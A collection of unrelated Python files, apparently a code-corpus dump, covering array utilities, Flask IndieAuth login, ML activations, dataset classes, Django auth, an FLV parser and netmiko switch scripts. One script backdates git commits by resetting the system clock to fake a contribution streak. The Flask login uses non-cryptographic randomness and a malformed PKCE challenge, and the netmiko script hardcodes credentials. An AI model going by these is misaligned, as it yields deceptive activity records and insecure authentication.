20
19
18
17
16
11
6
7
8
9
14
13
12
"""
import numpy as np
from random import random_integers
x = np.random.random_integers(0, 20, (3,4))
def unroll(x) :
print(x)
A = []
while x.shape[0] * x.shape[1] > 0 :
#0deg
try:
A.extend(x[0,:])
x = x[1:,:]
except :
break
#90deg
try:
A.extend(x[:,-1])
x = x[:,:-1]
except :
break
#180deg
try:
A.extend(list(reversed(x[-1,:])))
x = x[:-1,:]
except :
break
#270deg
try:
A.extend(list(reversed(x[:,0])))
x = x[:,1:]
except :
break
return A
unroll(x)
'''
unroll(x)
[[ 7 1 20 18]
[ 0 8 3 13]
[14 11 13 10]]
Out[116]: [7, 1, 20, 18, 13, 10, 13, 11, 14, 0, 8, 3]
''' | python |
from flask import request, render_template, redirect, flash, Blueprint, session, current_app
from ..config import CLIENT_ID, CALLBACK_URL
from bs4 import BeautifulSoup
import requests
import hashlib
import base64
import string
import random
auth = Blueprint('auth', __name__)
@auth.route("/callback")
def indieauth_callback():
code = request.args.get("code")
state = request.args.get("state")
if state != session.get("state"):
flash("Your authentication failed. Please try again.")
return redirect("/")
data = {
"code": code,
"redirect_uri": CALLBACK_URL,
"client_id": CLIENT_ID,
"grant_type": "authorization_code",
"code_verifier": session["code_verifier"]
}
headers = {
"Accept": "application/json"
}
r = requests.post(session.get("token_endpoint"), data=data, headers=headers)
if r.status_code != 200:
flash("There was an error with your token endpoint server.")
return redirect("/login")
# remove code verifier from session because the authentication flow has finished
session.pop("code_verifier")
if r.json().get("me").strip("/") != current_app.config["ME"].strip("/"):
flash("Your domain is not allowed to access this website.")
return redirect("/login")
session["me"] = r.json().get("me")
session["access_token"] = r.json().get("access_token")
return redirect("/")
@auth.route("/logout")
def logout():
session.pop("me")
session.pop("access_token")
return redirect("/home")
@auth.route("/discover", methods=["POST"])
def discover_auth_endpoint():
domain = request.form.get("indie_auth_url")
r = requests.get(domain)
soup = BeautifulSoup(r.text, "html.parser")
authorization_endpoint = soup.find("link", rel="authorization_endpoint")
if authorization_endpoint is None:
flash("An IndieAuth authorization ndpoint could not be found on your website.")
return redirect("/login")
if not authorization_endpoint.get("href").startswith("https://") and not authorization_endpoint.get("href").startswith("http://"):
flash("Your IndieAuth authorization endpoint published on your site must be a full HTTP URL.")
return redirect("/login")
token_endpoint = soup.find("link", rel="token_endpoint")
if token_endpoint is None:
flash("An IndieAuth token endpoint could not be found on your website.")
return redirect("/login")
if not token_endpoint.get("href").startswith("https://") and not token_endpoint.get("href").startswith("http://"):
flash("Your IndieAuth token endpoint published on your site must be a full HTTP URL.")
return redirect("/login")
auth_endpoint = authorization_endpoint["href"]
random_code = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(30))
session["code_verifier"] = random_code
session["authorization_endpoint"] = auth_endpoint
session["token_endpoint"] = token_endpoint["href"]
sha256_code = hashlib.sha256(random_code.encode('utf-8')).hexdigest()
code_challenge = base64.b64encode(sha256_code.encode('utf-8')).decode('utf-8')
state = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
session["state"] = state
return redirect(
auth_endpoint +
"?client_id=" + CLIENT_ID +
"&redirect_uri=" + CALLBACK_URL +
"&scope=profile&response_type=code&code_challenge=" + code_challenge +
"&code_challenge_method=S256&state=" + state
)
@auth.route("/login", methods=["GET", "POST"])
def login():
return render_template("user/auth.html", title="James' Wiki Dashboard Login") | python |
import datetime
import os
# from heavy import special_commit
def modify():
file = open('zero.md', 'r')
flag = int(file.readline()) == 0
file.close()
file = open('zero.md', 'w+')
if flag:
file.write('1')
else:
file.write('0')
file.close()
def commit():
os.system('git commit -a -m test_github_streak > /dev/null 2>&1')
def set_sys_time(year, month, day):
os.system('date -s %04d%02d%02d' % (year, month, day))
def trick_commit(year, month, day):
set_sys_time(year, month, day)
modify()
commit()
def daily_commit(start_date, end_date):
for i in range((end_date - start_date).days + 1):
cur_date = start_date + datetime.timedelta(days=i)
trick_commit(cur_date.year, cur_date.month, cur_date.day)
if __name__ == '__main__':
daily_commit(datetime.date(2020, 9, 20), datetime.date(2020, 11, 9)) | python |
"""
Additional Activation functions not yet present in tensorflow
Creation Date: April 2020
Creator: GranScudetto
"""
import tensorflow as tf
def mish_activation(x):
"""
Mish activation function
as described in:
"Mish: A Self Regularized Non-Monotonic Neural Activation Function"
https://arxiv.org/abs/1908.08681
formula: mish(x) = x * tanh(ln(1 + exp(x)))
= x * tanh(softplus(x))
"""
return (x * tf.math.tanh(tf.math.softplus(x)))
def swish_activation(x):
"""
Swish activation function (currently only in tf-nightly)
as described in:
"Searching for Activation Functions"
https://arxiv.org/abs/1710.05941
formula: swish(x) = x* sigmoid(x)
"""
return(x * tf.math.sigmoid(x))
tf.keras.utils.get_custom_objects().update(
{'custom_activation': (tf.keras.layers.Activation(mish_activation),
tf.keras.layers.Activation(swish_activation))
}
)
| python |
# coding: utf-8
from __future__ import absolute_import
import unittest
from unittest import mock
from swagger_server.test import BaseTestCase
from swagger_server.wml_util import get_wml_credentials
from swagger_server.test_mocked.util import mock_wml_env, MOCKED_CREDENTIALS_VARS
class TestWMLUtil(BaseTestCase, unittest.TestCase):
"""WML util integration test stubs"""
@mock_wml_env()
@mock.patch("swagger_server.wml_util.requests.request")
def test_get_wml_credentials(self, mock_request):
"""Test case for get_wml_credentials
Get WML credentials
"""
mock_request.return_value.json.return_value = {
"access_token": "token",
"refresh_token": "refresh_token",
"token_type": "Bearer",
"expires_in": 3600,
"expiration": 1598543068,
"scope": "ibm openid"
}
expected = ("{'token': 'token', 'space_id': '" + MOCKED_CREDENTIALS_VARS['WML_SPACE_ID'] + "', 'url': '" + MOCKED_CREDENTIALS_VARS['WML_URL'] + "'}")
response = get_wml_credentials()
assert isinstance(response, object)
assert str(response) == expected, 'response is not matching expected response'
mock_request.assert_called_once_with("POST", 'https://iam.cloud.ibm.com/identity/token', data='grant_type=urn%3Aibm%3Aparams%3Aoauth%3Agrant-type%3Aapikey&apikey=apikey', headers=mock.ANY) | python |
"""
Code to represent a dataset release.
"""
from enum import Enum
import json
import copy
from dataclasses import dataclass
from typing import Dict, List, Tuple
####################
# Utility functions and enums.
def load_jsonl(fname):
return [json.loads(line) for line in open(fname)]
class Label(Enum):
SUPPORTS = 1
NEI = 0
REFUTES = -1
def make_label(label_str, allow_NEI=True):
lookup = {"SUPPORT": Label.SUPPORTS,
"NOT_ENOUGH_INFO": Label.NEI,
"CONTRADICT": Label.REFUTES}
res = lookup[label_str]
if (not allow_NEI) and (res is Label.NEI):
raise ValueError("An NEI was given.")
return res
####################
# Representations for the corpus and abstracts.
@dataclass(repr=False, frozen=True)
class Document:
id: str
title: str
sentences: Tuple[str]
def __repr__(self):
return self.title.upper() + "\n" + "\n".join(["- " + entry for entry in self.sentences])
def __lt__(self, other):
return self.title.__lt__(other.title)
def dump(self):
res = {"doc_id": self.id,
"title": self.title,
"abstract": self.sentences,
"structured": self.is_structured()}
return json.dumps(res)
@dataclass(repr=False, frozen=True)
class Corpus:
"""
A Corpus is just a collection of `Document` objects, with methods to look up
a single document.
"""
documents: List[Document]
def __repr__(self):
return f"Corpus of {len(self.documents)} documents."
def __getitem__(self, i):
"Get document by index in list."
return self.documents[i]
def get_document(self, doc_id):
"Get document by ID."
res = [x for x in self.documents if x.id == doc_id]
assert len(res) == 1
return res[0]
@classmethod
def from_jsonl(cls, corpus_file):
corpus = load_jsonl(corpus_file)
documents = []
for entry in corpus:
doc = Document(entry["doc_id"], entry["title"], entry["abstract"])
documents.append(doc)
return cls(documents)
####################
# Gold dataset.
class GoldDataset:
"""
Class to represent a gold dataset, include corpus and claims.
"""
def __init__(self, corpus_file, data_file):
self.corpus = Corpus.from_jsonl(corpus_file)
self.claims = self._read_claims(data_file)
def __repr__(self):
msg = f"{self.corpus.__repr__()} {len(self.claims)} claims."
return msg
def __getitem__(self, i):
return self.claims[i]
def _read_claims(self, data_file):
"Read claims from file."
examples = load_jsonl(data_file)
res = []
for this_example in examples:
entry = copy.deepcopy(this_example)
entry["release"] = self
entry["cited_docs"] = [self.corpus.get_document(doc)
for doc in entry["cited_doc_ids"]]
assert len(entry["cited_docs"]) == len(entry["cited_doc_ids"])
del entry["cited_doc_ids"]
res.append(Claim(**entry))
res = sorted(res, key=lambda x: x.id)
return res
def get_claim(self, example_id):
"Get a single claim by ID."
keep = [x for x in self.claims if x.id == example_id]
assert len(keep) == 1
return keep[0]
@dataclass
class EvidenceAbstract:
"A single evidence abstract."
id: int
label: Label
rationales: List[List[int]]
@dataclass(repr=False)
class Claim:
"""
Class representing a single claim, with a pointer back to the dataset.
"""
id: int
claim: str
evidence: Dict[int, EvidenceAbstract]
cited_docs: List[Document]
release: GoldDataset
def __post_init__(self):
self.evidence = self._format_evidence(self.evidence)
@staticmethod
def _format_evidence(evidence_dict):
# This function is needed because the data schema is designed so that
# each rationale can have its own support label. But, in the dataset,
# all rationales for a given claim / abstract pair all have the same
# label. So, we store the label at the "abstract level" rather than the
# "rationale level".
res = {}
for doc_id, rationales in evidence_dict.items():
doc_id = int(doc_id)
labels = [x["label"] for x in rationales]
if len(set(labels)) > 1:
msg = ("In this SciFact release, each claim / abstract pair "
"should only have one label.")
raise Exception(msg)
label = make_label(labels[0])
rationale_sents = [x["sentences"] for x in rationales]
this_abstract = EvidenceAbstract(doc_id, label, rationale_sents)
res[doc_id] = this_abstract
return res
def __repr__(self):
msg = f"Example {self.id}: {self.claim}"
return msg
def pretty_print(self, evidence_doc_id=None, file=None):
"Pretty-print the claim, together with all evidence."
msg = self.__repr__()
print(msg, file=file)
# Print the evidence
print("\nEvidence sets:", file=file)
for doc_id, evidence in self.evidence.items():
# If asked for a specific evidence doc, only show that one.
if evidence_doc_id is not None and doc_id != evidence_doc_id:
continue
print("\n" + 20 * "#" + "\n", file=file)
ev_doc = self.release.corpus.get_document(doc_id)
print(f"{doc_id}: {evidence.label.name}", file=file)
for i, sents in enumerate(evidence.rationales):
print(f"Set {i}:", file=file)
kept = [sent for i, sent in enumerate(ev_doc.sentences) if i in sents]
for entry in kept:
print(f"\t- {entry}", file=file)
####################
# Predicted dataset.
class PredictedDataset:
"""
Class to handle predictions, with a pointer back to the gold data.
"""
def __init__(self, gold, prediction_file):
"""
Takes a GoldDataset, as well as files with rationale and label
predictions.
"""
self.gold = gold
self.predictions = self._read_predictions(prediction_file)
def __getitem__(self, i):
return self.predictions[i]
def __repr__(self):
msg = f"Predictions for {len(self.predictions)} claims."
return msg
def _read_predictions(self, prediction_file):
res = []
predictions = load_jsonl(prediction_file)
for pred in predictions:
prediction = self._parse_prediction(pred)
res.append(prediction)
return res
def _parse_prediction(self, pred_dict):
claim_id = pred_dict["id"]
predicted_evidence = pred_dict["evidence"]
res = {}
# Predictions should never be NEI; there should only be predictions for
# the abstracts that contain evidence.
for key, this_prediction in predicted_evidence.items():
label = this_prediction["label"]
evidence = this_prediction["sentences"]
pred = PredictedAbstract(int(key),
make_label(label, allow_NEI=False),
evidence)
res[int(key)] = pred
gold_claim = self.gold.get_claim(claim_id)
return ClaimPredictions(claim_id, res, gold_claim)
@dataclass
class PredictedAbstract:
# For predictions, we have a single list of rationale sentences instead of a
# list of separate rationales (see paper for details).
abstract_id: int
label: Label
rationale: List
@dataclass
class ClaimPredictions:
claim_id: int
predictions: Dict[int, PredictedAbstract]
gold: Claim = None # For backward compatibility, default this to None.
def __repr__(self):
msg = f"Predictions for {self.claim_id}: {self.gold.claim}"
return msg
def pretty_print(self, evidence_doc_id=None, file=None):
msg = self.__repr__()
print(msg, file=file)
# Print the evidence
print("\nEvidence sets:", file=file)
for doc_id, prediction in self.predictions.items():
# If asked for a specific evidence doc, only show that one.
if evidence_doc_id is not None and doc_id != evidence_doc_id:
continue
print("\n" + 20 * "#" + "\n", file=file)
ev_doc = self.gold.release.corpus.get_document(doc_id)
print(f"{doc_id}: {prediction.label.name}", file=file)
# Print the predicted rationale.
sents = prediction.rationale
kept = [sent for i, sent in enumerate(ev_doc.sentences) if i in sents]
for entry in kept:
print(f"\t- {entry}", file=file)
| python |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import User
from .forms import CustomUserChangeForm,CustomUserCreationForm
class UserAdmin(UserAdmin):
add_form = CustomUserCreationForm
form = CustomUserChangeForm
model = User
fieldsets = (
('User Profile', {'fields': ('name',)}),
) + UserAdmin.fieldsets
list_display = ('username','name','is_superuser')
search_fields = ['name',]
admin.site.register(User,UserAdmin) | python |
import ptypes, math, logging
from ptypes import *
from .primitives import *
ptypes.setbyteorder(ptypes.config.byteorder.bigendian)
### primitives
## float types
class FLOAT16(pfloat.half): pass
class FLOAT(pfloat.single): pass
class DOUBLE(pfloat.double): pass
## int types
class SI8(pint.int8_t): pass
class SI16(pint.int16_t): pass
class SI24(pint.int_t): length = 3
class SI32(pint.int32_t): pass
class SI64(pint.int64_t): pass
class UI8(pint.int8_t): pass
class UI16(pint.int16_t): pass
class UI24(pint.int_t): length = 3
class UI32(pint.int32_t): pass
class UI64(pint.int64_t): pass
(SI8, UI8, SI16, UI16, SI32, UI32, UI64) = ( pint.bigendian(x) for x in (SI8,UI8,SI16,UI16,SI32,UI32,UI64) )
## fixed-point types
class SI8_8(pfloat.sfixed_t): length,fractional = 2,8
class SI16_16(pfloat.sfixed_t): length,fractional = 4,16
class UI8_8(pfloat.ufixed_t): length,fractional = 2,8
class UI16_16(pfloat.ufixed_t): length,fractional = 4,16
#### Tags
class TagHeader(ptype.definition): cache = {}
class TagBody(ptype.definition): cache = {}
### AUDIODATA
@TagHeader.define
class AudioTagHeader(pbinary.struct):
type = 8
_fields_ = [
(4,'SoundFormat'),
(2,'SoundRate'),
(1,'SoundSize'),
(1,'SoundType'),
(lambda s: 8 if s['SoundFormat'] == 10 else 0,'AACPacketType'),
]
# FIXME
@TagBody.define
class AudioTagBody(pstruct.type):
type = 8
def __Data(self):
h = self.getparent(FLVTAG)['TagHeader'].li
return AudioPacketData.lookup(h['SoundFormat'])
_fields_ = [(__Data, 'Data')]
## audio packet data
class AudioPacketData(ptype.definition): cache = {}
@AudioPacketData.define
class AACAUDIODATA(pstruct.type):
type = 10
_fields_ = [(lambda s: AudioSpecificConfig if s.getparent(FLVTAG)['TagHeader'].li['AACPacketType'] == 0 else ptype.block, 'Data')]
### VIDEODATA
@TagHeader.define
class VideoTagHeader(pstruct.type):
type = 9
class Type(pbinary.struct):
_fields_ = [(4, 'FrameType'), (4, 'CodecID')]
def summary(self):
return 'FrameType:{:d} CodecId:{:d}'.format(self['FrameType'], self['CodecID'])
def __Header(self):
t = self['Type'].li
return VideoPacketHeader.withdefault(t['CodecID'], type=t['CodecID'])
_fields_ = [
(Type, 'Type'),
(__Header, 'Header'),
]
def summary(self):
h = self['Type']
return 'Type{{{:s}}} {:s}'.format(h.summary(), self['Header'].classname(), self['Header'].summary() or repr(''))
# FIXME
@TagBody.define
class VideoTagBody(pstruct.type):
type = 9
def __Data(self):
h = self.getparent(StreamTag)['Header'].li
t = h['Type']
if t['FrameType'] == 5:
return UI8
return VideoPacketData.lookup(t['CodecId'])
_fields_ = [(__Data,'Data')]
## video packet header
class VideoPacketHeader(ptype.definition):
cache = {}
class unknown(pstruct.type): _fields_ = []
default = unknown
@VideoPacketHeader.define
class AVCVIDEOPACKETHEADER(pstruct.type):
type = 7
class AVCPacketType(pint.enum, UI8):
_values_ = [
(0, 'AVC sequence header'),
(1, 'AVC NALU'),
(2, 'AVC end-of-sequence header'),
]
_fields_ = [
(AVCPacketType, 'AVCPacketType'),
(SI24, 'CompositionTime'),
]
## video packet data
class VideoPacketData(ptype.definition): cache = {}
@VideoPacketData.define
class H263VIDEOPACKET(pbinary.struct):
"""Sorenson H.263"""
type = 2
def __Custom(self):
t = self['PictureSize']
if t == 0:
return 8
elif t == 1:
return 16
return 0
class ExtraInformation(pbinary.terminatedarray):
class _object_(pbinary.struct):
_fields_ = [
(1, 'Flag'),
(lambda s: s['Flag'] and 8 or 0, 'Data'),
]
def isTerminator(self, value):
return self['Flag'] == 0
class MACROBLOCK(pbinary.struct):
class BLOCKDATA(ptype.block):
# FIXME: Look up H.263 ieee spec
pass
_fields_ = [
(1, 'CodecMacroBlockFlag'),
# ...
(ptype.block, 'MacroBlockType'), # H.263 5.3.2
(ptype.block, 'BlockPattern'), # H.263 5.3.5
(2, 'QuantizerInformation'), # H.263 5.3.6
(2, 'MotionVectorData'), # H.263 5.3.7
(6, 'ExtraMotionVectorData'), # H.263 5.3.8
(dyn.array(BLOCKDATA, 6), 'BlockData'),
]
_fields_ = [
(17, 'PictureStartCode'),
(5, 'Version'),
(8, 'TemporalReference'),
(3, 'PictureSize'),
(__Custom, 'CustomWidth'),
(__Custom, 'CustomHeight'),
(2, 'PictureType'),
(1, 'DeblockingFlag'),
(5, 'Quantizer'),
(ExtraInformation, 'ExtraInformation'),
(MACROBLOCK, 'Macroblock'),
]
@VideoPacketData.define
class SCREENVIDEOPACKET(pstruct.type):
"""Screen video"""
type = 3
class IMAGEBLOCK(pstruct.type):
_fields_ = [
(pint.bigendian(UI16), 'DataSize'), # UB[16], but whatever
(lambda s: dyn.block(s['DataSize'].li.int()), 'Data'),
]
def __ImageBlocks(self):
w,h = self['Width'],self['Height']
blocks_w = math.ceil(w['Image'] / float(w['Block']))
blocks_h = math.ceil(h['Image'] / float(h['Block']))
count = blocks_w * blocks_h
return dyn.array(self.IMAGEBLOCK, math.trunc(count))
class Dim(pbinary.struct):
_fields_ = [(4,'Block'),(12,'Image')]
_fields_ = [
(Dim, 'Width'),
(Dim, 'Height'),
(__ImageBlocks, 'ImageBlocks'),
]
@VideoPacketData.define
class VP6FLVVIDEOPACKET(ptype.block):
"""On2 VP6"""
type = 4
class Adjustment(pbinary.struct):
_fields_ = [(4, 'Horizontal'),(4,'Vertical')]
_fields_ = [
(Adjustment, 'Adjustment'),
(lambda s: dyn.block(s.getparent(StreamTag).DataSize() - s['Adjustment'].li.size()), 'Data'),
]
@VideoPacketData.define
class VP6FLVALPHAVIDEOPACKET(pstruct.type):
"""On2 VP6 with alpha channel"""
type = 5
def __AlphaData(self):
return ptype.undefined
def __Data(self):
streamtag = self.getparent(StreamTag)
sz = streamtag.DataSize()
ofs = self['OffsetToAlpha'].li.int()
if ofs + self['Adjustment'].li.size() >= sz:
logging.warning('OffsetToAlpha incorrect : %x', self.getoffset())
return dyn.block(sz - self['Adjustment'].size() - self['OffsetToAlpha'].size())
return dyn.block(ofs)
_fields_ = [
(VP6FLVVIDEOPACKET.Adjustment, 'Adjustment'),
(UI24, 'OffsetToAlpha'),
# (lambda s: dyn.block(s['OffsetToAlpha'].li.int()), 'Data'),
(__Data, 'Data'),
(lambda s: dyn.block(s.getparent(StreamTag).DataSize() - (s['Adjustment'].li.size()+s['OffsetToAlpha'].li.size()+s['Data'].li.size())), 'AlphaData'),
]
@VideoPacketData.define
class SCREENV2VIDEOPACKET(pstruct.type):
"""Screen video version 2"""
type = 6
class Flags(pbinary.struct):
_fields_ = [
(6, 'Reserved'),
(1, 'HasIFrameImage'),
(1, 'HasPaletteInfo'),
]
class IMAGEBLOCKV2(pstruct.type):
class IMAGEFORMAT(pbinary.struct):
_fields_ = [
(3, 'Reserved'),
(2, 'ColorDepth'),
(1, 'HasDiffBlocks'),
(1, 'ZlibPrimeCompressCurrent'),
(1, 'ZlibPrimeCompressPrevious'),
]
class IMAGEDIFFPOSITION(pstruct.type):
_fields_ = [(UI8,n) for n in ('RowStart','Height')]
class IMAGEPRIMEPOSITION(pbinary.struct):
_fields_ = [(UI8,n) for n in ('Block column','Block row')]
def __ImageBlockHeader(self):
# FIXME: since this field depends on 2 separate flags...which one should get prio?
fmt = self['Format'].li
if fmt['HasDiffBlocks']:
return self.IMAGEDIFFPOSITION
elif fmt['ZlibPrimeCompressCurrent']:
return self.IMAGEPRIMEPOSITION
return ptype.undefined
_fields_ = [
(pint.bigendian(UI16), 'DataSize'), # UB[16], but whatever
(IMAGEFORMAT, 'Format'),
(__ImageBlockHeader, 'ImageBlockHeader'),
(lambda s: dyn.block(s['DataSize'].li.int()), 'Data'),
]
def __ImageBlocks(self):
w,h = self['Width'],self['Height']
blocks_w = math.ceil(w['Image'] / float(w['Block']))
blocks_h = math.ceil(h['Image'] / float(h['Block']))
count = blocks_w * blocks_h
return dyn.array(self.IMAGEBLOCKV2, math.trunc(count))
def __IFrameImage(self):
w,h = self['Width'],self['Height']
blocks_w = math.ceil(w['Image'] / float(w['Block']))
blocks_h = math.ceil(h['Image'] / float(h['Block']))
count = blocks_w * blocks_h
return dyn.array(self.IMAGEBLOCKV2, math.trunc(count))
_fields_ = [
(SCREENVIDEOPACKET.Dim, 'Width'),
(SCREENVIDEOPACKET.Dim, 'Height'),
(Flags, 'Flags'),
(lambda s: s['Flags'].li['HasPaletteInfo'] and SCREENVIDEOPACKET.IMAGEBLOCK or ptype.block, 'PaletteInfo'),
(__ImageBlocks, 'ImageBlocks'),
(__IFrameImage, 'IFrameImage'),
]
@VideoPacketData.define
class AVCVIDEOPACKET(pstruct.type):
"""AVC"""
type = 7
def __Data(self):
h = self.getparent(StreamTag)['Header']
t = h['AVCPacketType'].int()
if t == 0:
# FIXME: ISO 14496-15, 5.2.4.1
return AVCDecoderConfigurationRecord
elif t == 1:
# FIXME: avcC
return NALU
return ptype.block
_fields_ = [
(__Data, 'Data')
]
### SCRIPTDATA
class SCRIPTDATAVALUE(pstruct.type):
def __ScriptDataValue(self):
t = self['Type'].li.int()
return SCRIPTDATATYPE.withdefault(t, type=t)
_fields_ = [
(UI8,'Type'),
(__ScriptDataValue, 'Value'),
]
def summary(self):
return '{:s}({:d})/{:s}'.format(self['Value'].classname(), self['Type'].int(), self['Value'].summary())
repr = summary
class SCRIPTDATATYPE(ptype.definition): cache = {}
class SCRIPTDATASTRING(pstruct.type):
_fields_ = [(UI16,'StringLength'),(lambda s:dyn.clone(STRING,length=s['StringLength'].li.int()),'StringData')]
def summary(self):
return self['StringData'].summary()
repr = summary
class SCRIPTDATAOBJECTPROPERTY(pstruct.type):
_fields_ = [(SCRIPTDATASTRING,'Name'),(SCRIPTDATAVALUE,'Value')]
def summary(self):
return '{!r}={!r}'.format(self['Name'].str(), self['Value'].str())
repr = summary
# FIXME
@TagBody.define
class ScriptTagBody(pstruct.type):
type = 18
_fields_ = [(SCRIPTDATAVALUE,'Name'),(SCRIPTDATAVALUE,'Value')]
def summary(self):
return 'Name:{:s} Value:{:s}'.format(self['Name'].summary(), self['Value'].summary())
repr = summary
@SCRIPTDATATYPE.define
class DOUBLE(DOUBLE):
type = 0
@SCRIPTDATATYPE.define
class UI8(UI8):
type = 1
@SCRIPTDATATYPE.define
class SCRIPTDATASTRING(SCRIPTDATASTRING):
type = 2
@SCRIPTDATATYPE.define
class SCRIPTDATAOBJECT(parray.terminated):
type = 3
_object_ = SCRIPTDATAOBJECTPROPERTY
def isTerminator(self, value):
return type(value['Value'].li['Value']) == SCRIPTDATAOBJECTEND
#return value['PropertyName'].li['StringLength'] == 0 and value['PropertyValue'].li['Type'].int() == SCRIPTDATAOBJECTEND.type
def summary(self):
return repr([ x.summary() for x in self ])
repr = summary
@SCRIPTDATATYPE.define
class UI16(UI16):
type = 7
@SCRIPTDATATYPE.define
class SCRIPTDATAECMAARRAY(pstruct.type):
type = 8
_fields_ = [
(UI32,'EcmaArrayLength'),
(SCRIPTDATAOBJECT, 'Variables'),
]
@SCRIPTDATATYPE.define
class SCRIPTDATAOBJECTEND(ptype.type):
type = 9
@SCRIPTDATATYPE.define
class SCRIPTDATASTRICTARRAY(pstruct.type):
type = 10
_fields_ = [(UI32,'StrictArrayLength'),(lambda s:dyn.clone(SCRIPTDATAVALUE,length=s['StrictArrayLength'].li.int()),'StrictArrayValue')]
def summary(self):
return '{!r}'.format([x.summary() for x in self['StrictArrayValue']])
repr = summary
@SCRIPTDATATYPE.define
class SCRIPTDATADATE(pstruct.type):
type = 11
_fields_ = [(DOUBLE,'DateTime'),(SI16,'LocalDateTimeOffset')]
def summary(self):
return 'DataTime:{:s} LocalDateTimeOffset:{:d}'.format(self['DateTime'].summary(), self['LocalDateTimeOffset'].int())
repr = summary
@SCRIPTDATATYPE.define
class SCRIPTDATALONGSTRING(pstruct.type):
type = 12
_fields_ = [
(UI32, 'StringLength'),
(lambda s: dyn.clone(STRING,length=s['StringLength'].li.int()), 'StringData'),
]
def summary(self):
return self['StringData'].str()
repr = summary
### Structures
class StreamTag(pstruct.type):
def __Header(self):
base = self.getparent(FLVTAG)
t = base['Type'].li['TagType']
return TagHeader.withdefault(t, type=t)
def __FilterParams(self):
base = self.getparent(FLVTAG)
return FilterParams if base['Type'].li['Filter'] == 1 else ptype.undefined
def __Body(self):
base = self.getparent(FLVTAG)
t = base['Type'].li['TagType']
return TagBody.withdefault(t, type=t, length=self.DataSize())
def DataSize(self):
base = self.getparent(FLVTAG)
sz = base['DataSize'].li.int()
ex = self['Header'].li.size() + self['FilterParams'].li.size()
return sz - ex
_fields_ = [
(__Header, 'Header'),
(__FilterParams, 'FilterParams'),
(__Body, 'Body'),
]
class EncryptionTagHeader(pstruct.type):
_fields_ = [
(UI8, 'NumFilters'),
(STRING, 'FilterName'),
(UI24, 'Length'),
]
class EncryptionFilterParams(pstruct.type):
_fields_ = [(dyn.array(UI8,16), 'IV')]
class SelectiveEncryptionFilterParams(pbinary.struct):
_fields_ = [(1,'EncryptedAU'),(7,'Reserved'),(lambda s: dyn.clone(pbinary.array,length=16,_object_=8),'IV')]
class FilterParams(pstruct.type):
def __FilterParams(self):
header = self.getparent(EncryptionTagHeader)
filtername = header['FilterName'].li.str()
if filtername == 'Encryption':
return EncryptionFilterParams
if filtername == 'SE':
return SelectiveEncryptionFilterParams
return ptype.undefined
_fields_ = [
(__FilterParams, 'FilterParams'),
]
class FLVTAG(pstruct.type):
class Type(pbinary.struct):
_fields_ = [(2,'Reserved'),(1,'Filter'),(5,'TagType')]
def summary(self):
return 'TagType:{:d} {:s}Reserved:{:d}'.format(self['TagType'], 'Filtered ' if self['Filter'] else '', self['Reserved'])
def __Extra(self):
sz = self['DataSize'].li.int()
ts = self['Stream'].li.size()
return dyn.block(sz-ts)
_fields_ = [
(Type, 'Type'),
(UI24, 'DataSize'),
(UI24, 'Timestamp'),
(UI8, 'TimestampExtended'),
(UI24, 'StreamID'),
(StreamTag, 'Stream'),
(__Extra, 'Extra'),
]
### file types
class File(pstruct.type):
class Header(pstruct.type):
class TypeFlags(pbinary.struct):
_fields_ = [(5,'Reserved(0)'),(1,'Audio'),(1,'Reserved(1)'),(1,'Video')]
def summary(self):
res = []
if self['Audio']: res.append('Audio')
if self['Video']: res.append('Video')
if self['Reserved(1)'] or self['Reserved(0)']: res.append('Reserved?')
return '/'.join(res)
def __Padding(self):
sz = self['DataOffset'].li.int()
return dyn.block(sz - 9)
_fields_ = [
(dyn.array(UI8,3), 'Signature'),
(UI8, 'Version'),
(TypeFlags, 'TypeFlags'),
(UI32, 'DataOffset'),
(__Padding, 'Padding'),
]
def __Padding(self):
h = self['Header'].li
sz = h['DataOffset'].int()
return dyn.block(sz - h.size())
class Body(parray.block):
class _object_(pstruct.type):
_fields_ = [
(UI32, 'PreviousTagSize'),
(FLVTAG, 'Tag'),
]
def __Body(self):
ex = self['Header'].li['DataOffset'].int()
return dyn.clone(self.Body, blocksize=lambda s:self.source.size() - ex)
_fields_ = [
(Header, 'Header'),
(__Body, 'Body'),
]
if __name__ == '__main__':
import ptypes,swf.flv as flv
ptypes.setsource(ptypes.prov.file('c:/users/user/Documents/blah.flv',mode='rb'))
a = flv.File()
a = a.l
print(a['Header']['TypeFlags'])
print(a['Header'])
print(a['Header']['Padding'].hexdump())
print(a['Body'][0]['Tag'])
print(a['Body'][0]['Tag']['TagData'])
| python |
# This should work on python 3.6+
import ahip
URL = "http://httpbin.org/uuid"
async def main(backend=None):
with ahip.PoolManager(backend=backend) as http:
print("URL:", URL)
r = await http.request("GET", URL, preload_content=False)
print("Status:", r.status)
print("Data:", await r.read())
print("--- Trio ---")
import trio
trio.run(main)
print("\n--- asyncio (via AnyIO) ---")
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
print("\n--- Curio (via AnyIO) ---")
import curio
curio.run(main)
| python |
#!/usr/bin/env python
from netmiko import ConnectHandler
iosv_l2_SW5 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.100',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW1 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.101',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW2 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.102',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW3 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.103',
'username': 'admin',
'password': 'cisco',
}
iosv_l2_SW4 = {
'device_type': 'cisco_ios',
'ip': '192.168.10.104',
'username': 'admin',
'password': 'cisco',
}
all_devices = [iosv_l2_SW3, iosv_l2_SW4, iosv_l2_SW2, iosv_l2_SW1, iosv_l2_SW5]
for device in all_devices:
net_connect = ConnectHandler(**device)
output = net_connect.send_command('wr mem')
print(output)
| python |
from django.conf import settings
from django.utils.deprecation import MiddlewareMixin
from django.utils.functional import SimpleLazyObject
from mediawiki_auth import mediawiki
def get_user(request):
if not hasattr(request, '_cached_user'):
request._cached_user = mediawiki.get_or_create_django_user(request)
return request._cached_user
class AuthenticationMiddleware(MiddlewareMixin):
def process_request(self, request):
assert hasattr(request, 'session'), (
"The Django authentication middleware requires session middleware "
"to be installed. Edit your MIDDLEWARE%s setting to insert "
"'django.contrib.sessions.middleware.SessionMiddleware' before "
"'django.contrib.auth.middleware.AuthenticationMiddleware'."
) % ("_CLASSES" if settings.MIDDLEWARE is None else "")
